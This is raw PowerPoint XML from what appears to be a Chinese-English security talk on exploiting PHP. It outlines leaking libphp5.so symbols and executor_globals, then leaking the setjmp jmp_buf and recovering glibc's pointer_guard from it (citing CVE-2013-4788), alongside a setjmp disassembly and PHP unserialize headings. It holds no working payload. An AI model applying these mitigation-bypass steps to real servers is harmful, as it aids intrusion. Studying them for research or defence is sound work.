              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>– 0X1000 == \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>x7fELF ??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32CE-D88D-40D6-B7C4-9F71A7B21E32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09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5.4 Leak useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kernel functions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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>arse libphp5.so ELF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>arse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libphp5.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dynstr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addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dynsym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addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>executor_globals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php_execute_script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zend_eval_string</a:t>
            </a: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FEB4-1EA9-4BC2-90B4-221DA1E663ED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373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5.5 Leak JMPBUF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5.5.1 JMPBUF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.5.2 Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>executor_globals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.5.3 Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>executor_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-&gt;bailout == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JMPBUF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756B-F89F-4393-8919-E7A5A1421E17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43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5.5.1 JMPBUF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setjmp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longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>异常处理机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保存恢复调用环境所需</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储在栈上</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>hp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executor_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保存指向当前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pointer obfuscation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>for ESP and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>EIP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>set_jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://hmarco.org/bugs/CVE-2013-4788.html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90CA2-3FED-42CF-8F51-C9B04F61DE2D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012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5.6 Crack JMPBUF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5.6.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反汇编 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.6.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就是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php_execute_script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数调用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set_jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.6.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>根据 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反推出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pointer_guard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.6.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>根据 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pointer_guard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>还原出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值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AB1F-AD94-4B9B-B6FB-550D24EA30D6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890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5.6.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反汇编</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()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048000" y="1689054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400" dirty="0"/>
              <a:t>mov    0x4(%esp),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>eax   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>,(%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>eax)    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,0x8(%eax)   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>0x4(%esp),%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor    %gs:0x18,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rol    $0x9,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>mov    %ecx,0x10(%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>mov    (%esp),%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor    %gs:0x18,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rol    $0x9,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>mov    %ecx,0x14(%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>,0xc(%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill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3535-E85A-4D34-B966-5D7A204D3D50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314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 PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反序列化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2.1 Serialize</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>nserialize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
